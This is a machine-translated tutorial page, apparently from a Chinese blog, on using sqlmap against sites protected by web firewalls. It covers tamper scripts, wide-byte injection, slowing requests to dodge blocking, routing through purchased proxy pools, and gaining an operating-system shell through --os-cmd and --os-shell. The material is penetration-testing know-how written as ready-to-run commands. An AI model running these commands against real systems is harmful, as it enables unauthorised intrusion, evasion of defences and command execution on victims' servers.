当前位置:网站首页>Sqlmap tutorial (IV) practical skills three: bypass the firewall
Sqlmap tutorial (IV) practical skills three: bypass the firewall
2022-07-07 07:15:00 【A τθ】
At present, many websites use waf Protect the website , During the penetration test , Many operations will be blocked , In the test SQL When the injection ,waf It will intercept the requested traffic ,
Lead to SQLMAP The requested content cannot reach the destination ,SQLMAP It is impossible to judge whether the target has injection ,waf Intercept malicious attack requests , Interception will be blacklisted , Cause attackers
Unable to access the target . Unable to perform security detection .
One 、 see temper modular
sqlmap --list-tamper
Two 、 Wide byte Injection
sqlmap -u "http://192.168.127.131/sql/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 4 --current-user
3、 ... and 、 Set the thread size
In case of waf When , If the concurrency is too large , Think of it as cc attack ,ip Will be blocked .
--threads=1 Set the thread to 1
Four 、 Set up http Request delay
--delay=DELAY Set each HTTP Requested delay seconds .
5、 ... and 、 Use proxy injection
sqlmap -u "http://192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1 --proxy=http://192.168.1.107:4455
6、 ... and 、 Use proxy pool injection
After purchasing the agent pool , Get the proxy and save it to a file , such as :proxy.txt
123.73.208.166:46603
123.73.63.29:46603
123.73.63.84:46603
112.123.40.42:40806
183.47.94.248:38090
121.237.149.88:13804
114.99.108.71:23359
123.73.209.246:46603
123.73.63.132:46603
119.55.253.202:39730
--proxy-file Load the agent list from the file .
sqlmap -u "http://192.168.0.136:7766/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 1 --proxy-file=proxy.txt
7、 ... and 、sqlmap Command execution
--os-cmd=OSCMD Execute operating system commands
--os-shell Call up the interactive operating system shell
The current user of the injection point is dba when , Use the above two commands , One is to execute commands , One is to call the interactive operating system shell
1、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-cmd="net user"
2、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-shell
Use --os-shell The command will pop up an interaction shell The interface of , You can enter commands , If it can echo, it will return the information of command execution .
边栏推荐
猜你喜欢
Mysql---- import and export & View & Index & execution plan
Bus消息总线
Communication between non parent and child components
After the promotion, sales volume and flow are both. Is it really easy to relax?
Pass parent component to child component: props
弹性布局(二)
Take you to brush (niuke.com) C language hundred questions (the first day)
关于数据库数据转移的问题,求各位解答下
Le Service MySQL manque dans le service informatique
Paranoid unqualified company
随机推荐
How to share the same storage among multiple kubernetes clusters
Implementation of AVL tree
Torefs API and toref API
Four goals for the construction of intelligent safety risk management and control platform for hazardous chemical enterprises in Chemical Industry Park
Basic introduction of JWT
Composition API premise
LC 面试题 02.07. 链表相交 & LC142. 环形链表II
Abnova membrane protein lipoprotein technology and category display
Lvs+kept (DR mode) learning notes
詳解機器翻譯任務中的BLEU
Common function detect_ image/predict
Can 7-day zero foundation prove HCIA? Huawei certification system learning path sharing
Maze games based on JS
JDBC database connection pool usage problem
mips uclibc 交叉编译ffmpeg,支持 G711A 编解码
组件的嵌套和拆分
JS decorator @decorator learning notes
Sword finger offer high quality code
非父子组件的通信
Introduction to abnova's in vitro mRNA transcription workflow and capping method